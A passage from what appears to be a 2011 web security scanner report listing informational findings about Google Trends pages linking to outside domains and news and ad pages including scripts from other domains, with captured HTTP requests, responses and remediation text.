http://www.businessinsider.com/espns-new-longhorn-network-not-available-to-most-at-university-of-texas-2011-9

Request

GET /trends/hottrends?q=longhorn+network&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:34 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11541
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: longhorn network, Sep 3,
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.businessinsider.com/espns-new-longhorn-network-not-available-to-most-at-university-of-texas-2011-9" target="_blank">
ESPN: <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.businessinsider.com/" target="_blank"> http://www.businessinsider.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.burntorangenation.com/2011/9/2/2401449/kansas-texas-to-air-on-longhorn-network" target="_blank">
Kansas-Texas to air on <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.burntorangenation.com/" target="_blank"> http://www.burntorangenation.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://suddenlinkfyi.com/2011/09/02/longhorn-network/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://suddenlinkfyi.com/" target="_blank"> http://suddenlinkfyi.com/</a>
...[SNIP]...

20.25. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X

The response contains the following links to other domains:

http://mashable.com/
http://mashable.com/2011/08/31/sprint-att-t-mobile-2/
http://techcrunch.com/
http://techcrunch.com/2011/09/01/sprint-attt-mobile-merger-would-destroy-jobs-heres-a-study-to-prove-it/
http://www.engadget.com/
http://www.engadget.com/2011/09/02/kyocera-milano-coming-to-sprint-september-9th-for-50-looks-not/

Request

GET /trends/hottrends?q=sprint&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:37 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11163
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: sprint, Sep 3, 2011</tit
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.engadget.com/2011/09/02/kyocera-milano-coming-to-sprint-september-9th-for-50-looks-not/" target="_blank">
Kyocera Milano coming to <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.engadget.com/" target="_blank"> http://www.engadget.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://techcrunch.com/2011/09/01/sprint-attt-mobile-merger-would-destroy-jobs-heres-a-study-to-prove-it/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://techcrunch.com/" target="_blank"> http://techcrunch.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://mashable.com/2011/08/31/sprint-att-t-mobile-2/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://mashable.com/" target="_blank"> http://mashable.com/</a>
...[SNIP]...

20.26. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X

The response contains the following links to other domains:

http://dailypostal.com/
http://dailypostal.com/2011/09/03/notre-dame-football-schedule-2011/
http://www.212articles.com/
http://www.212articles.com/usf-football-at-notre-dame-preview/
http://www.yougabsports.com/
http://www.yougabsports.com/pt/The-Beezes-2011-Notre-Dame-Football-Preview/blog.htm

Request

GET /trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:28 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11371
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: notre dame football, Sep
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.yougabsports.com/pt/The-Beezes-2011-Notre-Dame-Football-Preview/blog.htm" target="_blank">
- The Beezes 2011 <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.yougabsports.com/" target="_blank"> http://www.yougabsports.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://dailypostal.com/2011/09/03/notre-dame-football-schedule-2011/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://dailypostal.com/" target="_blank"> http://dailypostal.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.212articles.com/usf-football-at-notre-dame-preview/" target="_blank">
USF <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.212articles.com/" target="_blank"> http://www.212articles.com/</a>
...[SNIP]...

20.27. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=usc+football&date=2011-9-3&sa=X

The response contains the following links to other domains:

http://podcasts.scpr.org/news
http://www.212articles.com/
http://www.212articles.com/usc-football-trojans-defeat-minnesota-19-17/
http://www.conquestchronicles.com/
http://www.conquestchronicles.com/2011/9/2/2400765/so-lets-get-ready-for-some-usc-football
http://www.scpr.org/news/2011/09/03/28641/usc-football-season-begins-new-plans-security-traf/

Request

GET /trends/hottrends?q=usc+football&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:32 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11438
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: usc football, Sep 3, 201
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.scpr.org/news/2011/09/03/28641/usc-football-season-begins-new-plans-security-traf/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://podcasts.scpr.org/news" target="_blank"> http://podcasts.scpr.org/news</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.conquestchronicles.com/2011/9/2/2400765/so-lets-get-ready-for-some-usc-football" target="_blank">
So lets get ready for some <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.conquestchronicles.com/" target="_blank"> http://www.conquestchronicles.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.212articles.com/usc-football-trojans-defeat-minnesota-19-17/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.212articles.com/" target="_blank"> http://www.212articles.com/</a>
...[SNIP]...

20.28. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=printable+coupons&date=2011-9-3&sa=X

The response contains the following links to other domains:

http://www.commonsensewithmoney.com/
http://www.commonsensewithmoney.com/2011/09/printable-coupons-international-delight-mean-green-tyson-grilled-products-more/
http://www.passionforsavings.com/
http://www.passionforsavings.com/2011/09/printable-coupons-dial-scotties-tetley-biotrue-fiber-one/
http://www.wickedcooldeals.com/
http://www.wickedcooldeals.com/2011/09/coupon-network-new-printable-coupons-2.html

Request

GET /trends/hottrends?q=printable+coupons&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:44:07 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11281
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: printable coupons, Sep 3
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.passionforsavings.com/2011/09/printable-coupons-dial-scotties-tetley-biotrue-fiber-one/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.passionforsavings.com/" target="_blank"> http://www.passionforsavings.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.commonsensewithmoney.com/2011/09/printable-coupons-international-delight-mean-green-tyson-grilled-products-more/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.commonsensewithmoney.com/" target="_blank"> http://www.commonsensewithmoney.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.wickedcooldeals.com/2011/09/coupon-network-new-printable-coupons-2.html" target="_blank">
Coupon Network: New <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.wickedcooldeals.com/" target="_blank"> http://www.wickedcooldeals.com/</a>
...[SNIP]...

20.29. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=michigan+football&date=2011-9-3&sa=X

The response contains the following links to other domains:

http://dailypostal.com/
http://dailypostal.com/2011/09/03/michigan-football-2011-schedule/
http://www.bucksinsider.com/
http://www.bucksinsider.com/big-10/michigan-football-western-michigan-preview/
http://www.make100dollarstoday.com/
http://www.make100dollarstoday.com/michigan-football-stadium-cleared-due-to-lightning-game-ended-754

Request

GET /trends/hottrends?q=michigan+football&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:30 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11486
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: michigan football, Sep 3
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.bucksinsider.com/big-10/michigan-football-western-michigan-preview/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.bucksinsider.com/" target="_blank"> http://www.bucksinsider.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://dailypostal.com/2011/09/03/michigan-football-2011-schedule/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://dailypostal.com/" target="_blank"> http://dailypostal.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.make100dollarstoday.com/michigan-football-stadium-cleared-due-to-lightning-game-ended-754" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.make100dollarstoday.com/" target="_blank"> http://www.make100dollarstoday.com/</a>
...[SNIP]...

20.30. http://www.reuters.com/assets/commentsChild previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/commentsChild

Issue detail

The page was loaded from a URL containing a query string:

http://www.reuters.com/assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base

The response contains the following links to other domains:

http://connect.facebook.net/en_US/all.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:15 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:41:45 GMT
Age: 270
Vary: Accept-Encoding
Content-Length: 5297
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:41:45 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

21. Cross-domain script include previous next
There are 83 instances of this issue:

http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
http://cdn.optmd.com/V2/89733/235451/index.html
http://charlotteobserver.adperfect.com/
http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp
http://digg.com/submit
http://grfx.cstv.com/scripts/oas-omni-controls.js
http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012
https://login.yahoo.com/config/login
http://notredame-hospitality.cbscollegestore.com/store.cfm
https://observ.subscribeobserver.com/
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
http://s3.cinesport.com/app_v2/csprt_player.js
http://s3.cinesport.com/players/charlotteobservergeneric.html
http://sacramentoconnect.sacbee.com/
http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826
http://slashdot.org/bookmark.pl
http://stockscreener.us.reuters.com/Stock/US/Index
http://und.cbscollegestore.com/store.cfm
http://und.cbscollegestore.com/store_contents.cfm
http://www.bayareasearchengineacademy.org/blog/
http://www.careerbuilder.com/
http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx
http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx
http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx
http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx
http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx
http://www.cars.com/go/advice/index.jsp
http://www.cars.com/go/advice/shopping/cpo/index.jsp
http://www.cars.com/go/crp/index.jsp
http://www.cars.com/go/kbb/kbbInput.jsp
http://www.cars.com/go/photogalleries/index.jsp
http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
http://www.charlotteobserver.com/advertising/index.html
http://www.charlotteobserver.com/newsroom/index.html
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html
http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football
http://www.goutsa.com/ViewArticle.dbml
http://www.greenbiz.com/
http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story
http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
http://www.reuters.com/assets/commentsChild
http://www.reuters.com/assets/newsFlash
http://www.reuters.com/assets/print
http://www.reuters.com/do/emailArticle
http://www.reuters.com/finance/markets/index
http://www.reuters.com/news/archive/topNews
http://www.reuters.com/news/pictures/slideshow
http://www.reuters.com/news/video
http://www.reuters.com/video/2011/06/08/dramatic-video-captures-toronto-lightnin
http://www.reuters.com/video/2011/08/08/england-football-friendly-cancelled-afte
http://www.reuters.com/video/2011/08/15/football-gains-level-playing-field
http://www.reuters.com/video/2011/08/18/lockheed-martin-presents-airship-of-the
http://www.reuters.com/video/2011/08/22/buenos-aires-fashion-week-sizzles
http://www.reuters.com/video/2011/08/26/experimental-plane-reaches-13000-mph
http://www.reuters.com/video/2011/09/02/job-angst-disrupts-stock-market
http://www.reuters.com/video/2011/09/02/job-seeker-finds-job-in-tough-times
http://www.reuters.com/video/2011/09/03/cias-close-links-with-gaddafi-revealed
http://www.reuters.com/video/2011/09/03/dsk-departs
http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams
http://www.sacbee.com/mr/b.gif
http://www.sacbee.com/mr/e.gif
http://www.sacbee.com/mr/f.gif
http://www.sacbee.com/reg-bin/int.cgi
http://www.sacbee.com/reg-bin/tint.cgi
https://www.sprint.net/
https://www.sprint.net/index.php
http://www.stumbleupon.com/submit
http://www.thatsracin.com/reg-bin/int.cgi
http://www.tsn.ca/ncaa/story/
http://www.und.com/allaccess/
http://www.und.com/sports/m-footbl/9873956
http://www.und.com/sports/m-footbl/9874134
http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
http://www.usatoday.com/community/profile.htm
http://www.usatoday.com/marketing/feedback.htm
http://www.usatoday.com/marketing/questions.htm
http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html
http://www.wunderground.com/auto/sacbee/CA/Sacramento.html
http://www.youtube.com/results

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

21.1. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88303-3335-5

Issue detail

The response dynamically includes the following script from another domain:

http://js.c12s.com/ant-cf.js?0_740_139668830333355_0_53_100004

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 517
Date: Sun, 04 Sep 2011 00:45:20 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;art
...[SNIP]...
</a><script language="JavaScript" src="http://js.c12s.com/ant-cf.js?0_740_139668830333355_0_53_100004"></script>
...[SNIP]...

21.2. http://cdn.optmd.com/V2/89733/235451/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.optmd.com
Path:	/V2/89733/235451/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62?mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/

Request

GET /V2/89733/235451/index.html HTTP/1.1
Host: cdn.optmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 02 Sep 2011 20:55:36 GMT
ETag: "ce5613-1a3-4abfb95404200"
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:12 GMT
Content-Length: 419
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Personal Creations</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62?mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/"></script>
...[SNIP]...

21.3. http://charlotteobserver.adperfect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://charlotteobserver.adperfect.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/combined_1314384833.min.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/json2.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/lazyload-min.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquery/v1.3.2/jquery-1.3.2.min.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquerycaret/jcaret.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryqueue/v1.0/ajaxqueue.1.0.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryscrollto/v1.4.2/jquery.scrollTo.1.4.2.min.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquerytools/v1.2.2/jquery.tools.min.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryui/v1.7.2/jquery-ui-1.7.2.custom.min.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/loadselect_1313193312.js
http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/privateparty_1313193312.min.js
http://d2acq6zvr4qvep.cloudfront.net/library/47B8B7F11188014BC6OqLI9C3DA1/assets/jstext.global.20110829151635.js
http://media.charlotteobserver.com/mistats/finalizestats.js
http://media.charlotteobserver.com/mistats/sites/clt/charlotteobserver.js
http://media.charlotteobserver.com/mistats/vendors/adperfect.js
http://media.charlotteobserver.com/mistats/vendors/adperfect_s_code.js

Request

GET / HTTP/1.1
Host: charlotteobserver.adperfect.com
Accept: */*
Accept-Language: en
